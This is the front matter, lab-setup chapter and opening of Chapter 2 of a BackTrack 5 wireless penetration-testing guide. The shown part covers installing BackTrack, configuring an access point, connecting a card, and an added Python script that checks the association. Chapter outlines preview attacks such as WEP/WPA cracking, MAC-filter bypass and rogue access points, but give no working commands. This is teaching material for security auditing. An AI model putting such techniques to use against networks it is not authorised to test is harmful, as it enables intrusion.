Wireless networks have become ubiquitous in today's world. Millions of people use them worldwide every day at their homes, offices, and public hotspots to log on to the Internet and do both personal and professional work. Even though wireless makes life incredibly easy and gives us great mobility, it comes with its risks. In recent times, insecure wireless networks have been exploited to break into companies, banks, and government organizations. The frequency of these attacks has only intensified, as many network administrators still do not know how to secure wireless networks in a robust and foolproof way.





BackTrack 5 Wireless Penetration Testing: Beginner's Guide is aimed at helping the reader understand the insecurities associated with wireless networks, and how to conduct penetration tests to find and plug them. This is an essential read for those who would like to conduct security audits on wireless networks and have always wanted a step-by-step practical guide for the same. As every wireless attack explained in this book is immediately followed by a practical demo, the learning is very complete.


We have chosen BackTrack 5 as the platform to test all the wireless attacks in this book. BackTrack, as most of you may already be aware, is the world's most popular penetration testing distribution. It contains hundreds of security and hacking tools, some of which we will use in the course of this book.
What this book covers

Chapter 1, Wireless Lab Setup, introduces the dozens of exercises that we will be doing in this book. In order to be able to try them out, the reader will need to set up a wireless lab. This chapter focuses on how to create a wireless testing lab using off-the-shelf hardware and open source software. We will first look at the hardware requirements, which include wireless cards, antennas, access points, and other Wi-Fi-enabled devices; then we will shift our focus to the software requirements, which include the operating system, Wi-Fi drivers, and security tools. Finally, we will create a test bed for our experiments and verify different wireless configurations on it.
Chapter 2, WLAN and its Inherent Insecurities, focuses on the inherent design flaws in wireless networks which make them insecure out of the box. We will begin with a quick recap of the 802.11 WLAN protocols using a network analyzer called Wireshark. This will give us a practical understanding of how these protocols work. Most importantly, we will see how client and access point communication works at the packet level by analyzing Management, Control, and Data frames. We will then learn about packet injection and packet sniffing in wireless networks, and look at some tools which enable us to do the same.


Chapter 3, Bypassing WLAN Authentication, talks about how to break a WLAN authentication mechanism. We will go step by step and explore how to subvert Open and Shared Key authentication. In the course of this, you will learn how to analyze wireless packets and figure out the authentication mechanism of the network. We will also look at how to break into networks with Hidden SSID and MAC Filtering enabled. These are two common mechanisms employed by network administrators to make wireless networks more stealthy and difficult to penetrate; however, they are extremely simple to bypass.


Chapter 4, WLAN Encryption Flaws, discusses one of the most vulnerable parts of the WLAN protocol: the encryption schemes WEP, WPA, and WPA2. Over the past decade, hackers have found multiple flaws in these schemes and have written publicly available software to break them and decrypt the data. Even though WPA/WPA2 is secure by design, misconfiguring it opens up security vulnerabilities which can be easily exploited. In this chapter, we will understand the insecurities in each of these encryption schemes and do practical demos on how to break them.


Chapter 5, Attacks on the WLAN Infrastructure, shifts our focus to WLAN infrastructure 
vulnerabilities. We will look at the vulnerabilities created due to both configuration and 
design problems. We will do practical demos of attacks such as access point MAC spoofing, 
bit flipping and replay attacks, rogue access points, fuzzing, and denial of service. This 
chapter will give the reader a solid understanding of how to do a penetration test of the 
WLAN infrastructure. 


Chapter 6, Attacking the Client, opens your eyes if you have always believed that wireless client security was something you did not have to worry about. Most people exclude the client from their list when they think about WLAN security. This chapter will prove beyond doubt why the client is just as important as the access point when penetration testing a WLAN network. We will look at how to compromise security using client-side attacks such as mis-association, Caffe Latte, disassociation, ad-hoc connections, fuzzing, honeypots, and a host of others.
Chapter 7, Advanced WLAN Attacks, looks at more advanced attacks, as we will already have covered most of the basic attacks on both the infrastructure and the client. These attacks typically involve using multiple basic attacks in conjunction to break security in more challenging scenarios. Some of the attacks which we will learn include wireless device fingerprinting, man-in-the-middle over wireless, evading wireless intrusion detection and prevention systems, rogue access points operating over a custom protocol, and a couple of others. This chapter presents the absolute bleeding edge in wireless attacks out in the real world.


Chapter 8, Attacking WPA Enterprise and RADIUS, graduates the reader to the next level by introducing advanced attacks on WPA-Enterprise and the RADIUS server setup. These attacks will come in handy when the reader has to perform a penetration test on large enterprise networks which rely on WPA-Enterprise and RADIUS authentication to provide them with security. This is probably as advanced as Wi-Fi attacks can get in the real world.


Chapter 9, Wireless Penetration Testing Methodology, is where all the learning from the previous chapters comes together, and we will look at how to do a wireless penetration test in a systematic and methodical way. We will learn about the various phases of penetration testing (planning, discovery, attack, and reporting) and apply them to wireless penetration testing. We will also understand how to propose recommendations and best practices after a wireless penetration test.


Appendix A, Conclusion and Road Ahead, concludes the book and leaves the user with some 
pointers for further reading and research. 


What you need for this book 


To follow and recreate the practical exercises in this book, you will need two laptops with built-in Wi-Fi cards, an Alfa AWUS036H USB wireless adapter, BackTrack 5, and some other hardware and software. We have detailed this in Chapter 1, Wireless Lab Setup.


As an alternative to the two laptop setup, you could also create a Virtual Machine housing 
BackTrack 5 and connect the card to it over the USB interface. This will help you get started 
with using this book much faster, but we would recommend a dedicated machine running 
BackTrack 5 for actual assessments in the field. 


As a prerequisite, readers should be aware of the basics of wireless networks. This includes 
having prior knowledge about the basics of the 802.11 protocol and client access point 
communication. Though we will briefly touch upon some of this when we set up the lab, it is 
expected that the user is already aware of these concepts. 
Who this book is for

Though this book is part of the Beginner's Guide series, it is meant for all levels of users, from amateurs right through to wireless security experts. There is something for everyone. The book starts with simple attacks but then moves on to explain the more complicated ones, and finally discusses bleeding edge attacks and research. As all attacks are explained using practical demonstrations, it is very easy for readers at all levels to quickly try the attacks out by themselves. Please note that even though the book highlights the different attacks which can be launched against a wireless network, the real purpose is to educate the user to become a wireless penetration tester. An adept penetration tester would understand all the attacks out there and would be able to demonstrate them with ease, if requested by a client.
Conventions

In this book, you will find several headings appearing frequently.

To give clear instructions of how to complete a procedure or task, we use:

Time for action - heading

1. Action 1
2. Action 2
3. Action 3

Instructions often need some extra explanation so that they make sense, so they are followed with:

What just happened?

This heading explains the working of tasks or instructions that you have just completed.






You will also find some other learning aids in the book, including:

Pop quiz - heading

These are short multiple choice questions intended to help you test your own understanding.

Have a go hero - heading

These set practical challenges and give you ideas for experimenting with what you have learned.
You will also find a number of styles of text that distinguish between different kinds of information. Here are some examples of these styles, and an explanation of their meaning.

Code words in text are shown as follows: "We enabled the interface using the ifconfig command."

Words that you see on the screen, in menus or dialog boxes for example, appear in the text like this: "In order to see the data packets for our access point, add the following to the filter: (wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type_subtype == 0x20)."

Warnings or important notes appear in a box like this.

Tips and tricks appear like this.


Reader feedback

Feedback from our readers is always welcome. Let us know what you think about this book, what you liked or may have disliked. Reader feedback is important for us to develop titles that you really get the most out of.

To send us general feedback, simply send an e-mail to feedback@packtpub.com, and mention the book title in the subject of your message.

If there is a book that you need and would like to see us publish, please send us a note in the SUGGEST A TITLE form on www.packtpub.com or e-mail suggest@packtpub.com.

If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide on www.packtpub.com/authors.
Customer support

Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.

Errata

Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books, maybe a mistake in the text or the code, we would be grateful if you would report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/support, selecting your book, clicking on the errata submission form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded on our website, or added to any list of existing errata, under the Errata section of that title. Any existing errata can be viewed by selecting your title from http://www.packtpub.com/support.

Piracy

Piracy of copyright material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works, in any form, on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.

Please contact us at copyright@packtpub.com with a link to the suspected pirated material.

We appreciate your help in protecting our authors, and our ability to bring you valuable content.

Questions

You can contact us at questions@packtpub.com if you are having a problem with any aspect of the book, and we will do our best to address it.
Chapter 1: Wireless Lab Setup

Behind every successful execution are hours or days of preparation, and wireless penetration testing is no exception. In this chapter, we will create a wireless lab that we will use for our experiments in this book. Consider this lab as your preparation arena before you dive into real-world penetration testing!

Wireless penetration testing is a practical subject and it is important to first set up a lab where we can try out all the different experiments in this book in a safe and controlled environment. It is important that you set up this lab first before proceeding further in this book.


In this chapter, we shall look at the following:

- Hardware and software requirements
- BackTrack 5 installation
- Setting up an access point and configuring it
- Installing the wireless card
- Testing connectivity between the laptop and the access point


So let the games begin! 


Hardware requirements
We will need the following hardware to set up the wireless lab:

- Two laptops with internal Wi-Fi cards: We will use one of the laptops as the victim in our lab and the other as the penetration tester's laptop. Though almost any laptop would fit this profile, laptops with at least 3 GB of RAM are desirable. This is because we may be running a lot of memory-intensive software in our experiments.

- One Alfa wireless adapter: We need a USB Wi-Fi card that can support packet injection and packet sniffing, and that is supported by BackTrack. The best choice seems to be the Alfa AWUS036H card from Alfa Networks, as BackTrack supports this out of the box. This is available on Amazon.com for a retail price of $34 at the time of writing.

- One access point: Any access point which supports the WEP/WPA/WPA2 encryption standards would fit the bill. I will be using a D-Link DIR-615 Wireless N Router for the purpose of illustration in this entire book. You can purchase it from Amazon.com, where it is retailing at around $35 at the time of writing.

- An Internet connection: This will come in handy to perform research, download software, and for some of our experiments.


Software requirements

We will need the following software to set up the wireless lab:

- BackTrack 5: BackTrack can be downloaded from its official website, located at http://www.backtrack-linux.org. The software is open source and you should be able to download it directly from the website.

- Windows XP/Vista/7: You will need any one of Windows XP, Windows Vista, or Windows 7 installed on one of the laptops. This laptop will be used as the victim machine for the rest of the book.

It is important to note that even though we are using a Windows-based OS for our tests, the techniques learnt can be applied to any Wi-Fi capable devices such as smartphones and tablets, among others.





Installing BackTrack

Let us now quickly look at how to get up and running with BackTrack.

BackTrack will be installed on the laptop which will serve as the penetration tester's machine for the rest of the book.
Time for action - installing BackTrack

BackTrack is relatively simple to install. We will run BackTrack by booting it as a Live DVD and then install it on the hard drive.

Perform the following instructions step by step:

1. Burn the BackTrack ISO (we are using the BackTrack 5 KDE 32-bit edition) that you have downloaded onto a bootable DVD.

2. Boot the laptop with this DVD and select the option BackTrack Text - Default Boot Text Mode from the boot menu:

[Screenshot: the BackTrack Live CD boot menu, listing BackTrack Text - Default Boot Text Mode, BackTrack Stealth - No Networking enabled, BackTrack Forensics - No Drive or Swap Mount, BackTrack noDRM - No DRM Drivers, BackTrack Debug - Safe Mode, BackTrack Memtest - Run memtest, and Hard Drive Boot - boot the first hard disk; press Tab to edit options]
3. If booting was successful, then you should see the familiar BackTrack screen:

[Screenshot: the BackTrack 5 text-mode welcome screen ("Welcome to the BackTrack 5 Distribution, Codename Revolution"), listing the official home page http://www.backtrack-linux.org and official training at http://www.offensive-security.com, reminding you to type startx for a graphical interface and stating the default root password, with the motto "The quieter you become, the more you are able to hear"]

4. You can boot into the graphical mode by entering startx on the command prompt. Enjoy the boot music! Once you are in the GUI, your screen should resemble the following:

[Screenshot: the BackTrack KDE desktop with the Install BackTrack icon at the top-left]
5. Now click on the Install BackTrack icon at the top-left of the desktop. This will launch the BackTrack installer, as shown next:

[Screenshot: the installer's Welcome screen (Step 1 of 7) with the language list; it reads "Ready to install? Once you answer a few questions, the contents of the live CD can be installed on this computer so you can run BackTrack Live at full speed without the CD. Answering the questions should only take a few minutes."]

6. This installer is similar to the GUI-based installers of most Linux systems and should be simple to follow. Select the appropriate options in each screen and start the installation process. Once the installation is done, restart the machine as prompted and remove the DVD.

7. Once the machine restarts, it will present you with a login screen. Type in the login as "root" and the password as "toor". You should now be logged into your installed version of BackTrack. Congratulations!

I will be changing the desktop theme and some settings for this book. Feel free to use your own themes and color settings!
What just happened?

We have successfully installed BackTrack on the laptop! We will use this laptop as the penetration tester's laptop for all other experiments in this book.

Have a go hero - installing BackTrack on Virtual Box

We can also install BackTrack within virtualization software such as Virtual Box. For readers who might not want to dedicate a full laptop to BackTrack, this is the best option. The installation process of BackTrack in Virtual Box is exactly the same. The only difference is the pre-setup, which you will have to create in Virtual Box. Have a go at it! You can download Virtual Box from its website.

One of the other ways we can install and use BackTrack is via USB drives. This is particularly useful if you do not want to install on the hard drive but still want to store persistent data on your BackTrack instance, such as scripts and new tools. We would encourage you to try this out as well!
Setting up the access point

Now we will set up the access point. As mentioned earlier, we will be using the D-Link DIR-615 Wireless N Router for all the experiments in this book. However, feel free to use any other access point. The basic principles of operation and usage remain the same.

Time for action - configuring the access point

Let us begin! We will set the access point up to use Open Authentication with an SSID of "Wireless Lab".

Follow these instructions step by step:

1. Power on the access point and use an Ethernet cable to connect your laptop to one of the access point's Ethernet ports.
2. Enter the IP address of the access point's configuration interface in your browser. For the DIR-615, the manual gives it as 192.168.0.1. You should consult your access point's setup guide to find its IP address. If you do not have the manual for the access point, you can also find the IP address by running the route -n command: the gateway IP address is typically the access point's IP. Once you are connected, you should see a configuration portal which looks like this:

[Screenshot: the D-Link DIR-615 (Hardware Version B2) login page, "Log in to the router", with the user name Admin and an empty password field]
3. Explore the various settings in the portal after logging in and find the settings related to configuring a new SSID.

4. Change the SSID to Wireless Lab. Depending on the access point, you may have to reboot it for the settings to change:
[Screenshot: the DIR-615 SETUP > WIRELESS SETTINGS page. Wireless Network Settings: Enable Wireless: Always; Wireless Network Name (SSID): Wireless Lab; 802.11 Mode: Mixed 802.11n, 802.11g and 802.11b; Enable Auto Channel Scan: checked; Wireless Channel: 2.437 GHz - CH 6; Transmission Rate: Best (automatic); Channel Width: 20 MHz; Visibility Status: Visible. Wireless Security Mode: None (the page notes that the device supports WEP, WPA-Personal, and WPA-Enterprise, the last requiring an external RADIUS server). The Helpful Hints sidebar suggests changing the network name, enabling Auto Channel Scan, and enabling Hidden Mode so that clients do not see the network in scans]
6. Save the changes to the access point and reboot it, if required. Now your access point should be up and running with the SSID Wireless Lab.

An easy way to verify this is to use the Wireless Configuration utility on Windows and observe the available networks using the Windows laptop. You should find Wireless Lab as one of the networks in the listing:


[Screenshot: the Windows "Connect to a network" dialog listing Wireless Lab as an unsecured network alongside security-enabled and unnamed networks]

What just happened?

We have successfully set up our access point with the SSID Wireless Lab. It is broadcasting its presence and this is being picked up by our Windows laptop and others within its radio frequency (RF) range.




It is important to note that we have configured our access point in Open mode, which is 
the least secure. It is advisable not to connect this access point to the Internet for the time 
being, as anyone within the RF range will be able to use it to access the Internet. 


Have a go hero — configuring the access point to use WEP and WPA 


Play around with the configuration options of your access point. Try to see if you can get it 
up and running using encryption schemes such as WEP and WPA/WPA2. We will use these 
modes in the later chapters to illustrate attacks against them. 


Setting up the wireless card

Setting up our Alfa wireless card is much easier than the access point. The advantage is that BackTrack supports this card out of the box and ships with all the required drivers for it.
Time for action - configuring your wireless card

We will be using the Alfa wireless card with the penetration tester's laptop.

Please follow these instructions step by step to set up your card:

1. Plug the card into one of the BackTrack laptop's USB ports and boot it.

2. Once you log in, open a console terminal and type iwconfig. Your screen should resemble the following:


    root@bt:~# iwconfig
              no wireless extensions.

              no wireless extensions.

    wmaster0  no wireless extensions.

    wlan0     IEEE 802.11bg  ESSID:""
              Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
              Tx-Power=0 dBm
              Retry min limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

    root@bt:~#





As you can see, wlan0 is the wireless interface created for the Alfa wireless card. Type ifconfig wlan0 up to bring the interface up. Then type ifconfig wlan0 to see the current state of the interface:
    root@bt:~# ifconfig wlan0 up
    root@bt:~# ifconfig wlan0
    wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93
              UP BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

    root@bt:~#
3. The MAC address 00:c0:ca:3e:bd:93 should match the MAC address written under your Alfa card. This is a quick check to ensure that you have enabled the correct interface.






What just happened?

BackTrack ships with all the required drivers for the Alfa card. As soon as the machine booted, the card was recognized and was assigned the network interface wlan0.
Connecting to the access point

Now we will look at how to connect to the access point using the Alfa wireless card. Our access point has the SSID Wireless Lab and does not use any authentication.

Time for action - connecting to the access point

Here we go! Follow these steps to connect your wireless card to the access point:


1. Let us first see what wireless networks our Alfa card is currently detecting. Issue the command iwlist wlan0 scanning:

    root@bt:~# iwlist wlan0 scanning
    wlan0     Scan completed :
              Cell 01 - Address: 00:25:5E:17:41:4C
                        Channel:1
                        Frequency:2.412 GHz (Channel 1)
                        Quality=57/70  Signal level=-53 dBm
                        Encryption key:on
                        ESSID:"Vivek"
                        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                        Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
                                  36 Mb/s; 48 Mb/s; 54 Mb/s
                        Mode:Master
                        Extra:tsf=000000322b8db23c
                        Extra: Last beacon: 2586ms ago
                        IE: Unknown: 0005566976656B
                        IE: Unknown: 010482848B96
                        IE: Unknown: 030101
                        IE: Unknown: 2A0104
                        IE: Unknown: 32080C1218243048606C
                        IE: WPA Version 1
                            Group Cipher : TKIP
                            Pairwise Ciphers (1) : TKIP
                            Authentication Suites (1) : PSK
              Cell 02 - Address: 00:25:5E:17:41:4D
                        Channel:1
                        ...
              Cell 05 - Address: 00:21:91:D2:8E:25
                        Channel:9
                        Frequency:2.452 GHz (Channel 9)
                        Quality=70/70  Signal level=-15 dBm
                        Encryption key:off
                        ESSID:"Wireless Lab"
                        Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                        Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s
                                  36 Mb/s; 48 Mb/s; 54 Mb/s
                        Mode:Master
                        Extra:tsf=00000001c7fb4180
                        Extra: Last beacon: 13ms ago
                        IE: Unknown: 000C576972656C657373204C6162
                        IE: Unknown: 010482848B96
                        IE: Unknown: 030109
                        IE: Unknown: 2A0100
                        IE: Unknown: 32080C1218243048606C
                        IE: Unknown: DD180050F2020101000003A4000027A4000042435E0062322F00
                        ... (further vendor-specific IEs omitted)
3. As multiple access points can have the same SSID, verify that the MAC address mentioned in the Address field above matches your access point's MAC. You can find the access point's MAC address using its web-based GUI settings.

4. Now, issue the command iwconfig wlan0 essid "Wireless Lab" and then iwconfig wlan0 to check the status. If you have successfully connected to the access point, you should see the MAC address of the access point in the Access Point: field in the output of iwconfig, as shown in the following screenshot:





    root@bt:~# iwconfig wlan0 essid "Wireless Lab"
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:"Wireless Lab"
              Mode:Managed  Frequency:2.452 GHz  Access Point: 00:21:91:D2:8E:25
              Bit Rate=1 Mb/s   Tx-Power=27 dBm
              Retry min limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=70/70  Signal level=-9 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

    root@bt:~#
5. We know the access point has a management interface IP address of 192.168.0.1 from its manual. Alternatively, this is the same as the default router IP address when we run the route -n command. Let's set our IP address in the same subnet by issuing the command ifconfig wlan0 192.168.0.2 netmask 255.255.255.0 up. Verify that the address was applied by running ifconfig wlan0:

    root@bt:~# ifconfig wlan0 192.168.0.2 netmask 255.255.255.0 up
    root@bt:~# ifconfig wlan0
    wlan0     Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93
              inet addr:192.168.0.2  Bcast:192.168.0.255  Mask:255.255.255.0
              inet6 addr: fe80::2c0:caff:fe3e:bd93/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:107 errors:0 dropped:0 overruns:0 frame:0
              TX packets:93 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:82778 (82.7 KB)  TX bytes:10597 (10.5 KB)

    root@bt:~#





6. Now let's ping the access point by issuing the command ping 192.168.0.1. If the network connection has been set up properly, then you should see the responses from the access point. You can additionally issue an arp -a to verify that the response is coming from the access point. You should see that the MAC address of the IP 192.168.0.1 is the access point's MAC address we noted earlier. It is important to note that some of the more recent access points might have responses to ICMP Echo Request packets disabled. This is typically done to make the access point secure out of the box with only the bare minimum configuration settings available. In such a case, you could try to launch a browser and access the web interface to verify that the connection is up and running.


root@bt:~# ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=13.5 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=12.3 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=64 time=12.7 ms
64 bytes from 192.168.0.1: icmp_seq=4 ttl=64 time=8.17 ms
64 bytes from 192.168.0.1: icmp_seq=5 ttl=64 time=14.8 ms
64 bytes from 192.168.0.1: icmp_seq=6 ttl=64 time=4.75 ms

--- 192.168.0.1 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5008ms
rtt min/avg/max/mdev = 4.758/11.082/14.858/3.500 ms
root@bt:~# arp -a
? (192.168.0.1) at 00:21:91:d2:8e:25 [ether] on wlan0
root@bt:~#
[Screenshot: the access point's web interface, LOG page (menu: DEVICE INFO, LOG, 
STATISTICS, INTERNET SESSIONS, WIRELESS). The hint panel reads: "Use this option to 
view the router logs. You can define what types of events you want to view and the 
event levels to view. This router also has internal syslog server support so you can 
send the log files to a computer on your network that is running a syslog utility. 
You can also have the log mailed to you periodically." Log settings: What to View: 
Firewall & Security, Router Status; View Levels: Critical, Informational. 
LOG DETAILS (3 log entries): 
  Sat Jan 31 13:23:24 2004  [INFO]  Wireless system with MAC address 00C0CA3EBD93 associated 
  Sat Jan 31 13:23:13 2004  [INFO]  Log viewed by IP address 192.168.0.2 
  Sat Jan 31 13:23:13 2004  [INFO]  Log cleared by IP address 192.168.0.2] 
What just happened? 
We just connected to our access point successfully from BackTrack using our Alfa wireless 
card as the wireless device. We also learnt how to verify that a connection has been 
established at both the wireless client and the access point side. 
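The two-sided check described in this exercise, as an added example that is not code from the book: it parses text in the shape of the iwconfig, arp -a and access point log output shown above and confirms that the client associated with the access point we intended. The three sample outputs are constructed to match the lab values on the preceding pages (ESSID "Wireless Lab", access point MAC 00:21:91:D2:8E:25, client MAC 00:c0:ca:3e:bd:93, management IP 192.168.0.1); the function names and the frequency-to-channel mapping are this example's own, and the log line format is assumed to be the one shown on the access point's LOG page.

```python
"""Verify a wireless association from both the client and the access point side.

Added example, not code from the book.  The three sample outputs below are
constructed to match the lab values in this chapter; the log line format is
assumed to be the one shown on the access point's LOG page.
"""
import re

IWCONFIG_OUTPUT = """\
wlan0     IEEE 802.11bg  ESSID:"Wireless Lab"
          Mode:Managed  Frequency:2.452 GHz  Access Point: 00:21:91:D2:8E:25
          Bit Rate=1 Mb/s   Tx-Power=27 dBm
          Encryption key:off
"""
ARP_OUTPUT = "? (192.168.0.1) at 00:21:91:d2:8e:25 [ether] on wlan0\n"
AP_LOG = """\
Sat Jan 31 13:23:24 2004 [INFO] Wireless system with MAC address 00C0CA3EBD93 associated
Sat Jan 31 13:23:13 2004 [INFO] Log viewed by IP address 192.168.0.2
Sat Jan 31 13:23:13 2004 [INFO] Log cleared by IP address 192.168.0.2
"""


def normalize_mac(mac):
    """Canonical lower-case colon form; accepts 00C0CA3EBD93, 00-c0-..., 00:C0:..."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % mac)
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def frequency_to_channel(ghz):
    """Map a centre frequency in GHz to its 802.11 channel number (2.4 and 5 GHz bands)."""
    mhz = int(round(ghz * 1000))
    if mhz == 2484:                                     # channel 14 is the odd one out
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2407) % 5 == 0:   # channels 1 to 13, 5 MHz apart
        return (mhz - 2407) // 5
    if 5000 < mhz < 6000 and mhz % 5 == 0:              # 5 GHz band: 5000 + 5 * channel
        return (mhz - 5000) // 5
    raise ValueError("no channel for %s GHz" % ghz)


def parse_iwconfig(text):
    """ESSID, mode, channel and associated BSSID from iwconfig output for one interface."""
    essid = re.search(r'ESSID:"([^"]*)"', text)
    mode = re.search(r"Mode:(\w+)", text)
    freq = re.search(r"Frequency:([\d.]+) GHz", text)
    ap = re.search(r"Access Point: ([0-9A-Fa-f:]{17})", text)   # absent when Not-Associated
    return {"essid": essid.group(1) if essid else None,
            "mode": mode.group(1) if mode else None,
            "channel": frequency_to_channel(float(freq.group(1))) if freq else None,
            "bssid": normalize_mac(ap.group(1)) if ap else None}


def arp_mac_for(text, ip):
    """MAC the kernel learned for `ip`, taken from `arp -a` output, or None."""
    for line in text.splitlines():
        m = re.match(r"\S+ \((\S+)\) at ([0-9a-fA-F:]{17})", line)
        if m and m.group(1) == ip:
            return normalize_mac(m.group(2))
    return None


def ap_log_associations(text):
    """Client MACs the access point's own log reports as associated."""
    return [normalize_mac(m.group(1)) for m in
            re.finditer(r"MAC address ([0-9A-Fa-f]{12}) associated", text)]


def verify_association(iwconfig, arp, ap_log, essid, bssid, ap_ip, client_mac):
    """Return (ok, problems); every failed check is described in `problems`."""
    link = parse_iwconfig(iwconfig)
    want = normalize_mac(bssid)
    problems = []
    if link["essid"] != essid:
        problems.append("ESSID is %r, expected %r" % (link["essid"], essid))
    if link["bssid"] != want:     # the name alone does not identify an AP, the BSSID does
        problems.append("associated with %s, expected %s" % (link["bssid"], want))
    seen = arp_mac_for(arp, ap_ip)
    if seen != want:
        problems.append("%s resolves to %s in the ARP table, expected %s" % (ap_ip, seen, want))
    if normalize_mac(client_mac) not in ap_log_associations(ap_log):
        problems.append("access point log shows no association for %s" % client_mac)
    return not problems, problems


if __name__ == "__main__":
    ok, problems = verify_association(IWCONFIG_OUTPUT, ARP_OUTPUT, AP_LOG, "Wireless Lab",
                                      "00:21:91:D2:8E:25", "192.168.0.1", "00:c0:ca:3e:bd:93")
    print("association verified" if ok else "\n".join(problems))
```

Run as a script it prints either "association verified" or one line per failed check. The ESSID is compared only as a sanity check: any access point can be configured with the same name, so the checks that matter compare the BSSID seen by the client (iwconfig and the ARP entry for the management IP) with the MAC noted from the access point, and then look for the client's own MAC in the access point's log, which is the only evidence that comes from the other side of the link.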














Have a go hero — establishing connection in WEP configuration 


Here is a challenging exercise for you—set up the access point in WEP configuration. For 
each of these, try establishing a connection with the access point using the wireless adapter. 
Hint: 









1. After issuing the command ifconfig wlan0 up, how do you verify the wireless 
card is up and functional? 

2. Can we run all our experiments using the BackTrack live CD alone? And not install it 
to the hard drive? 

3. What does the command arp -a show? 

4. Which tool should we use in BackTrack to connect to WPA/WPA2 networks? 


Summary 


This chapter provided you with detailed instructions on how to set up your own wireless lab. 
Also, in the process, you have learned the basic steps towards: 


- Installing BackTrack on your hard drive and exploring other options like VMware 
  and USB 
- Configuring your access point over the web interface 
- Understanding and using several commands to configure and use your wireless card 
- How to verify the connection state between the wireless client and the access point 


It is important that you gain confidence in configuring the system. If not, it is advisable that 
you repeat these examples a couple of times. In later chapters, we will be designing more 
complicated scenarios. 


In the next chapter, we will learn about the inherent insecurities in WLANs because of 
design. We will be using the network analyzer tool Wireshark to understand these concepts 
in a practical way. 





Chapter 2 
WLAN and Its Inherent Insecurities 

    "The loftier the building, the deeper the foundation must be laid." 
                                                - Thomas Kempis, Writer 

Nothing great can be built on a weak foundation, and in our context, nothing 
secure can be built on something which is inherently insecure. 

WLANs by design have certain insecurities which are relatively easy to exploit, such as packet 
spoofing, packet injection, and sniffing (which could even happen from far away). We will 
explore those flaws in this chapter. 

In this chapter, we will look at the following: 

- Revisiting WLAN frames 
- Different frame types and sub-types 
- Using Wireshark to sniff Management, Control, and Data frames 
- Sniffing data packets for a given wireless network 
- Injecting packets into a given wireless network 

Let's get started! 


Revisiting WLAN frames 


As this book deals with the security aspects of wireless networks, we will assume that you 
already have a basic understanding of the protocol and the packet headers. If not, or if it has 
been some time since you worked on wireless networks, this would be a good time to revisit 
them. 


Let us now quickly review some basic concepts of WLANs which most of you may already be 
aware of. In WLANs, communication happens over frames. A frame would have the following 
header structure: 

  Field | Frame Control | Duration/ID | Address 1 | Address 2 | Address 3 | Sequence Control | Address 4 | QoS Control | Frame Body | FCS 
  Bytes |       2       |      2      |     6     |     6     |     6     |        2         |     6     |      2      | 0 to 2312  |  4 

The "Frame Control" field itself has a more complex structure: 

  Field | Protocol Version | Type | Subtype | To DS | From DS | More Fragments | Retry | Power Management | More Data | Protected Frame | Order 
  Bits  |        2         |  2   |    4    |   1   |    1    |       1        |   1   |        1         |     1     |        1        |   1 

The Type field defines the type of WLAN frame, which has three possibilities: 


1. Management frames: Management frames are responsible for maintaining 
communication between the access points and wireless clients. The Management 
frames can have the following sub-types: 

   - Authentication 
   - De-authentication 
   - Association Request 
   - Association Response 
   - Reassociation Request 
   - Reassociation Response 
   - Disassociation 
   - Beacon 
   - Probe Request 
   - Probe Response 

2. Control frames: Control frames are responsible for ensuring a proper exchange of 
data between the access point and wireless clients. Control frames can have the 
following sub-types: 

   - Request to Send (RTS) 
   - Clear to Send (CTS) 
   - Acknowledgement (ACK) 

3. Data frames: Data frames carry the actual data sent on the wireless network. There 
are no sub-types for data frames. 


We will discuss the security implications of each of these frames when we discuss different 
attacks in later chapters. 


We will now look at how to sniff these frames over a wireless network using Wireshark. 
There are other tools like Airodump-NG, Tcpdump, or Tshark which can be used for sniffing 
as well. We will, however, use Wireshark for most of this book, but we encourage you to 
explore other tools. The first step in doing this is to create a monitor mode interface. This 
will create an interface for our Alfa card which allows us to read all wireless frames in the air, 
regardless of whether they are destined for us or not. In the wired world, this is popularly called 
promiscuous mode. 


Time for action — creating a monitor mode interface 


Let's now set our Alfa card into monitor mode! 





Follow these instructions to get started: 


1. Boot into BackTrack with your Alfa card connected. Once you are within the console, 
